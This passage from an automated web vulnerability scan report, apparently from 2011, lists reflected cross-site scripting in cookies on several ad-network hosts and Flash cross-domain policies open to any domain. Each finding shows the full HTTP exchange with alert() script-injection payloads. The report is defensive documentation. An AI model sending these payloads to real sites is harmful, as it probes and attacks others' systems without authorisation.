Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=e3801'><script>alert(1)</script>d13b84e748b; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:34 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9623943&token=e3801'><script>alert(1)</script>d13b84e748b' height='1' width='1'>
...[SNIP]...
4.375. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adtech_de cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eeff8'><script>alert(1)</script>80be8307ff was submitted in the token_nai_adtech_de cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=eeff8'><script>alert(1)</script>80be8307ff; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2495810&token=eeff8'><script>alert(1)</script>80be8307ff' height='1' width='1'>
...[SNIP]...
4.376. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_advertising_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5dd19'><script>alert(1)</script>58f82832c9f was submitted in the token_nai_advertising_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=5dd19'><script>alert(1)</script>58f82832c9f; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13676


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2482033&token=5dd19'><script>alert(1)</script>58f82832c9f' height='1' width='1'>
...[SNIP]...
4.377. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_glb_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c76c9'><script>alert(1)</script>de78b2c8c1e was submitted in the token_nai_glb_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=c76c9'><script>alert(1)</script>de78b2c8c1e; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:24:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=1321544&token=c76c9'><script>alert(1)</script>de78b2c8c1e' height='1' width='1'>
...[SNIP]...
4.378. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_tacoda_at_atwola_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a19a'><script>alert(1)</script>c104add94ec was submitted in the token_nai_tacoda_at_atwola_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=3a19a'><script>alert(1)</script>c104add94ec; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13676


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4917737&token=3a19a'><script>alert(1)</script>c104add94ec' height='1' width='1'>
...[SNIP]...
4.379. http://contextweb.pixel.invitemedia.com/context_sync [uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb.pixel.invitemedia.com
Path:   /context_sync

Issue detail

The value of the uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be7a"><script>alert(1)</script>497a87d9567 was submitted in the uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /context_sync?call_type=iframe HTTP/1.1
Host: contextweb.pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
Cookie: segments_p1="eJzjYuFo+MjIxcLR3McEJDs7mIFk73EQu+8+iD1xOwuQnAQkOTmmBwj8utv2BSQw8wdIydw/ICUL74AMWPQHJHLsNYi9rBEkvhEoy8yxNg9IrM8D8deDdG4Cq9gBJneCrd4NZu8Dk/vB5Gmw6UfB7GPfQezT70HsM2DyAljkEljNLbDzboPJuUAXcHLcjxZ4/uPNZxagrc9zgaL3J4LkPnwA6fwCJr8DSWaOfxwA98xIvg=="; exchange_uid=eyIyIjogWyIyMjMwNjE2MjU1NTY5NzE1ODc3IiwgNzM0Mzg3XSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; uid=776b70d9-5df4-4d1b-98af-982dd1709cac7be7a"><script>alert(1)</script>497a87d9567; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXSwgIjc5IjogWyIwMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSIsIHRydWVdfQ=="; conversions="{\"70914\": 1315307386+ \"61326\": 1315307639}"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:14 GMT
Pragma: no-cache
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 194
Connection: close
Server: Jetty(7.3.1.v20110307)

<html><body><img width="0" height="0" src="http://bh.contextweb.com/bh/rtset?do=add&pid=538569&ev=776b70d9-5df4-4d1b-98af-982dd1709cac7be7a"><script>alert(1)</script>497a87d9567"/></body></html>
4.380. http://r.skimresources.com/api/ [skimGUID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /api/

Issue detail

The value of the skimGUID cookie is copied into the HTML document as plain text between tags. The payload d4a68<img%20src%3da%20onerror%3dalert(1)>e882ff3272a was submitted in the skimGUID cookie. This input was echoed as d4a68<img src=a onerror=alert(1)>e882ff3272a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /api/?callback=skimlinksApplyHandlers&data=%7B%22pubcode%22%3A%22905X224440%22%2C%22domains%22%3A%5B%22rachelroy.com%22%2C%22endless.com%22%2C%22temptalia.com%22%2C%22sephora.com%22%2C%22facebook.com%22%2C%22twitter.com%22%2C%22digg.com%22%2C%22myspace.com%22%2C%22new.facebook.com%22%2C%22sweepstakes.womansday.com%22%2C%22services.hearstmags.com%22%2C%22caranddriver.com%22%2C%22cycleworld.com%22%2C%22elledecor.com%22%2C%22roadandtrack.com%22%2C%22womansday.com%22%2C%22glo.msn.com%22%5D%7D HTTP/1.1
Host: r.skimresources.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: skimGUID=6143baaf427c4464c6409f9bf9037436d4a68<img%20src%3da%20onerror%3dalert(1)>e882ff3272a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:52:11 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
X-SKIM-Hostname: api08
Content-Length: 176
Connection: keep-alive

skimlinksApplyHandlers({"merchant_domains":["sephora.com","endless.com"],"guid":"6143baaf427c4464c6409f9bf9037436d4a68<img src=a onerror=alert(1)>e882ff3272a","country":"US"});
5. Flash cross-domain policy  previous  next
There are 153 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://208.111.153.35/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://208.111.153.35
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 208.111.153.35

Response

HTTP/1.0 200 OK
Pragma: no-cache
Content-Length: 187
Server: FlashCom/4.0.3
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
5.2. http://33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:36 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:23 GMT
Accept-Ranges: bytes
Content-Length: 211
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sat, 01 Oct 2011 16:44:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...
5.3. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/1.0.5
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 07 Sep 2011 14:07:19 GMT
Accept-Ranges: bytes
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>
5.4. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:58 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "fe47a-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.5. http://a.rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:57 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.6. http://a.rfihub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.7. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.8. http://ad.agkn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Sat, 17 Sep 2011 16:43:19 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...
5.9. http://ad.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sat, 17 Sep 2011 21:59:46 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sat, 17 Sep 2011 16:38:25 GMT
X-Varnish: 523954775 523906680
Age: 2319
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...
5.10. http://ad.auditude.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.auditude.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 24 Sep 2011 16:23:18 GMT
Cache-Control: max-age=604800
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 25 Jul 2011 17:10:02 GMT
Content-Length: 261
Date: Sat, 17 Sep 2011 16:23:18 GMT
Server: lighttpd/1.4.18

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.11. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
